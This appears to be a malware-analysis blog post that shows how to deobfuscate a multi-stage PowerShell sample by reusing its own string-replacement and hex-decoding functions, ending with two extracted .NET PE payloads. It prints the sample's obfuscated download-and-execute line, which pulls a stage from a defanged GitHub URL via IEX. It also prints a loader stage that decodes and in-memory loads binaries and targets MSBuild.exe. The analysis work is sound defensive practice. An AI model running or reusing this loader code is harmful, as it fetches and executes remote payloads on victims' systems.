Smarter, Not Harder: Getting Malware to Help You Analyze It
When analyzing even non-advanced malware nowadays it’s common to find pretty heavy levels of obfuscation within samples. PowerShell and .NET malware for Windows can be obfuscated easily using various packers/crypters or script obfuscation tools. If you know how to manipulate the malware code, however, you can use the deobfuscation capabilities of malware to reveal unpacked samples.
Newton’s Third Law (of Malware)
If you’ve studied Physics you’ve likely run across Newton’s Third Law of Motion: “For every action, there is an equal and opposite reaction.” The same law can be applied to obfuscated malware. When at rest or during transmission, adversaries may encrypt or encode malicious code to avoid static signatures. During execution, though, the encoding or encryption must be removed so the code can successfully load and execute.
To facilitate this process, adversaries commonly include algorithms within obfuscated code designed to remove the obfuscation at runtime. If you can focus on how the algorithm is called and used, you can use it for your own purposes!
Safety First!
This exercise in deobfuscation requires us to execute portions of code from malware. We’re not performing dynamic analysis, but there is the possibility that we might accidentally execute some malicious code. To protect against this possibility, use a virtual machine for analysis. Prior to analysis, remove any network connections and shared folders before taking a snapshot and beginning to work.
During analysis we want to identify any code designed to interpret, invoke, or execute commands so we can comment them out. We only want to execute commands designed to manipulate data and write data to files.
A Simple Example to Start
An excellent example of using the malware code against itself can be found with this sample: https://www.virustotal.com/gui/file/578f5dba1af809ee5b492582c38c5cf6e8bd1319fe91cc2cb0fb6066ca3c1eb9/. This sample leads to the execution of a second sample that is more complex which we can also work with.
The original code for this sample appears similar to this:
1
2
3
4
5
6
$1 = 'Net'+'.@@@@@@@@@@@@@$$$$$$$$$$$$$$$$$>>>>>>>>>>>>>t'.Replace('@@@@@@@@@@@@@$$$$$$$$$$$$$$$$$>>>>>>>>>>>>>',''+'Webc'+'lien')
$2 = '>>>>>>>>>>>>>>>>>>~~~~~~~~~~~~~~~~~~okE'.Replace('>>>>>>>>>>>>>>>>>>~~~~~~~~~~~~~~~~~~','InV')
$3 = 'D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g'
I`EX((n`e`W`-Obj`E`c`T (($1))).(($3)).$2((('hxxps://raw.githubusercontent[.]com/az3r12/NYAN/main/Server.jpg')))).Replace('ooooiiiiiiiiiijhgfghjiugghjllknfderrthbbvccdssgvhhgoooooo','ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0').Replace('rxectfyvhgbuyhnikjmmnubyvbgvfcttyghuytvcxetcryvtubyjnhbgvfcdrctvuybvcrxrtyuubvtrcex','[Parameter(Mandatory=$true)] [String]$HLH').Replace('trdyjtuybiuyminubyvtcrytvybunibuyvtcrxtcytvuybiubihugyftuyiuo','New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)').Replace('fyyfbyfyfjyfjvyhtftdvbytdvtftfbfbytf','[Convert]::ToByte($HLH.Substring($i, 2), 16)').Replace('trcymtuvybiuyvtcrtcytuyiubyvtcw4gh5djf6g7nbfvdrcsxetcrdytfbygyvcdr','{').Replace('yuuuuuuuuuuuuuuuuvgggggggggggxddddddddddzswvttttttttt','(').Replace('mbappebgfvnjjhffgjjufghiolmgfd mbappe',')')
In this example, the first three variables contain substrings of Net.Webclient.DownloadString
obfuscated using string replacement and a string broken up into individual characters. This indicates PowerShell will download something from a URL. Later in the code there is a URL, so we can reasonably assume the code will download something from it. At the beginning of the final line, an IEX
statement is slightly obfuscated using a single character. IEX
is shorthand for Invoke-Expression
in PowerShell, and we can assume it will execute any code downloaded from the URL.
After the IEX
there are loads of .Replace()
function calls. This is where the adversary manipulates data in their next stage of the chain. Presumably whatever gets executed will have junk code inside, but the junk code is replaced by real, useful code before execution. Once we retrieve the next stage into a text file, we can deobfuscate it using this code:
1
2
3
4
5
$obfuscated_script = Get-Content ./Server.jpg
$deobfuscated_script = $obfuscated_script.Replace('ooooiiiiiiiiiijhgfghjiugghjllknfderrthbbvccdssgvhhgoooooo','ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0').Replace('rxectfyvhgbuyhnikjmmnubyvbgvfcttyghuytvcxetcryvtubyjnhbgvfcdrctvuybvcrxrtyuubvtrcex','[Parameter(Mandatory=$true)] [String]$HLH').Replace('trdyjtuybiuyminubyvtcrytvybunibuyvtcrxtcytvuybiubihugyftuyiuo','New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)').Replace('fyyfbyfyfjyfjvyhtftdvbytdvtftfbfbytf','[Convert]::ToByte($HLH.Substring($i, 2), 16)').Replace('trcymtuvybiuyvtcrtcytuyiubyvtcw4gh5djf6g7nbfvdrcsxetcrdytfbygyvcdr','{').Replace('yuuuuuuuuuuuuuuuuvgggggggggggxddddddddddzswvttttttttt','(').Replace('mbappebgfvnjjhffgjjufghiolmgfd mbappe',')')
Set-Content -Path ./deobfuscated_Server.jpg.ps1 -Value $deobfuscated_script
In this particular case we reused the .Replace()
function calls to make all the deobfuscation happen automatically rather than doing a manual find and replace operation for each one. This sort of efficiency can add up to a lot of saved time during analysis.
Getting More Complex
The next stage in the chain looks something like this (except with much more hex content):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$b1 = "111"
$b2 = "105"
$b3 = "130"
$b4 = "[String]" ; $t0=-Join (($b1, $b2, $b3 )| ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0
$b4=$TC = "4D5A9\/\/\/\/3...".replace('\/','0' )
Function HBankers {
[CmdletBinding( )]
[OutputType([byte[]] )]
param(
[Parameter(Mandatory=$true)] [String]$HLH
)
$HHPPLL = New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)
for ($i = 0; $i -lt $HLH.Length; $i += 2 ) {
$HHPPLL[$i / 2] = [Convert]::ToByte($HLH.Substring($i, 2), 16)
}
return [byte[]]$HHPPLL
}
[String]$HL = '4D5A9\/\/\/\/3...'.replace('\/','0' )
$A1 = "Ge>>>>>>>>>>>>>>>..............>>>>>>>>>>od".Replace('>>>>>>>>>>>>>>>..............>>>>>>>>>>','tMeth' )
$A2 = "g!!!!!!!!!!!!!@@@@@@@@@@@@@@@@################in".Replace('!!!!!!!!!!!!!@@@@@@@@@@@@@@@@################','et_CurrentDoma' )
$A3 = "I@@@@@@@@@@@@@@@>>>>>>>>>>>>>>..!!!!!!!!!!!!!!!!!!!!!!e".Replace('@@@@@@@@@@@@@@@>>>>>>>>>>>>>>..!!!!!!!!!!!!!!!!!!!!!!','nvok' )
$A4 = "Lo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!".Replace('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!','ad' )
$a7 = "$null"
$a5 = '[S!!!!!!!!!!!!!!@@@@@@@@@@@@@@!!!!!!!!!!!!!!!!^^^^^^^^^^^^^in]'.Replace('!!!!!!!!!!!!!!@@@@@@@@@@@@@@!!!!!!!!!!!!!!!!^^^^^^^^^^^^^','ystem.AppDoma' ) | g ; $a5.$A1($A2 ).$A3($a7,$null ).$A4([Byte[]](HBankers ($HL ) ) )| g
$a8 = 'MS>>>>>>>>>>>>>.........e'.Replace('>>>>>>>>>>>>>.........','Build.ex' )
[Byte[]]$HH= HBankers $TC
[rerup]::qw5f0($a8,$HH )
There’s a lot of fun obfuscation in this step of the chain, but I want to focus on two particular components: the hex strings starting with 4D5A
. The 4D5A
represents a traditional Windows PE header bytes that gets represented as MZ
in ASCII. The script is shortened in this post for brevity, but examining it in VirusTotal will show the sample contains almost 200KB of encoded text. In addition, we can see there are two Byte[]
array structures used by the code. We can hypothesize that the two hex strings decode into Windows PE files that will eventually be held inside those byte arrays. Now, how can we make that happen?
In both the Byte[]
array statements, the adversary references the function HBankers()
. In addition, the declaration for this function shows it takes string input and outputs a byte array. We can reasonably assume this function performs deobfuscation, so let’s use it to our advantage! We can use portions of the malware in our own script here:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[String]$TC = "4D5A9\/\/\/\/3...".replace('\/','0' )
[String]$HL = '4D5A9\/\/\/\/3...'.replace('\/','0' )
Function HBankers {
[CmdletBinding( )]
[OutputType([byte[]] )]
param(
[Parameter(Mandatory=$true)] [String]$HLH
)
$HHPPLL = New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)
for ($i = 0; $i -lt $HLH.Length; $i += 2 ) {
$HHPPLL[$i / 2] = [Convert]::ToByte($HLH.Substring($i, 2), 16)
}
return [byte[]]$HHPPLL
}
[Byte[]]$deobfuscated_bin_1 = HBankers $TC
[Byte[]]$deobfuscated_bin_2 = HBankers $HL
Set-Content -Path deobfuscated_1.bin -Value $deobfuscated_bin_1 -AsByteStream
Set-Content -Path deobfuscated_2.bin -Value $deobfuscated_bin_2 -AsByteStream
Now we can execute the script and then take a look at the files that get created:
1
2
3
PS /home/ForensicITGuy/NYAN> file *.bin
deobfuscated_1.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
deobfuscated_2.bin: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
And just like that, we have the PE binary payloads for additional analysis! The HBanker()
function contained everything we needed to output a byte array into a variable, and Set-Content
provided means for us to write that byte array to disk. Now that we have the files, we can continue analysis in the near future.